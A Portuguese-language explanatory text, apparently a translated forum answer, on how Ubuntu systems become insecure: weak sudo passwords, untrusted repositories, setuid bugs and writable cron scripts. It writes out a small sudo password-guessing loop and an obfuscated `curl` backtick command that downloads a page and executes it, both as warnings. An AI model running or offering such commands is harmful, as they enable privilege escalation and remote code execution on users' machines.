Quebrar a senha de root não é possível, porque o Ubuntu desativou o usuário root por padrão. No entanto, se seu usuário pode se tornar root através do sudo e sua senha é fácil de adivinhar / força bruta, você possui um sistema inseguro. Exemplo de script tentando testar alguma senha:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
A adição de um repositório não confiável permite a instalação de programas desse repositório. Mesmo se você não instalar explicitamente um aplicativo como esse sudo apt-get install [app-from-repo]
, o repositório ainda poderá afetar outros programas, fazendo o Ubuntu acreditar que o repositório contém uma versão mais recente de um determinado programa.
O processo de atualização é executado como raiz, caso contrário, os arquivos não podem ser gravados em /usr/bin
ou /etc
. Um gatilho de instalação também é executado como root e pode executar arbitrariamente e, possivelmente, comandos prejudiciais. Agora, não se preocupe, é necessária uma ação manual para atualizar os programas e os repositórios do Ubuntu são seguros. Software de código fechado como o Windows nunca pode ser totalmente confiável, porque você não pode verificar o código malicioso da fonte, mas pode revisar a fonte do aplicativo Ubuntu se precisar (não se aplica a programas proprietários como o sun-java6
Flash).
Conforme mencionado por Javier Rivera, os bugs do kernel podem levar à execução arbitrária de código, mas o software com bug também é perigoso, especialmente os setsuid
binários raiz de buggy (binários que serão executados no proprietário do arquivo, raiz) e outros programas de bugs que são executados como raiz.
Você pode criar falhas de segurança no seu sistema se não prestar atenção no que está fazendo. Por exemplo, sem entender completamente o conceito de cronjobs, você adicionou um cronjob ao /etc/cron.daily
qual executa um programa em sua pasta pessoal (por exemplo, /bin/sh /home/your-username/myscript.sh
se o arquivo myscript.sh for gravável por você, você poderá ser excluído por você, uma exploração poderá colocar mal intencionados. código no myscript.sh
qual seria executado como root (escalonamento de privilégios).
Para ficar seguro, use sua mente! Não execute comandos de fontes não confiáveis se você não souber o que faz. Se alguém disser executar `curl 3221233674`
com back-ticks, não. 3221233674 é outra maneira de escrever 192.0.32.10
(IP de example.com). Então, seria igual a:
`curl http://example.com/`
Esses back-ticks fazem com que a saída seja executada como comandos do shell. Em inglês simples, "Faça o download da página http://example.com/ e tente executar a página baixada".
No início, você não veria algo malicioso no comando fornecido. Mas agora, você sabe que também pode ser abusado.
Sempre verifique os comandos / scripts obtidos de fontes não confiáveis, como a Internet.